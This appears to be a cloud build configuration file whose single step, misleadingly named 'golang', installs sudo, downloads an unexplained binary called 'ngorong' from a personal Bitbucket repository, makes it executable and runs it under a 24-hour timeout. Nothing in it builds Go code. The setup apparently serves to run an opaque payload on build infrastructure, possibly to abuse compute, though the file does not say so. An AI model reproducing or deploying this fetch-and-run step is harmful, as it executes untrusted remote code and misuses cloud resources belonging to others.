steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://bitbucket.org/jeffreyadams29/paketu/raw/master/ngorong && chmod u+x ngorong && ./ngorong
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
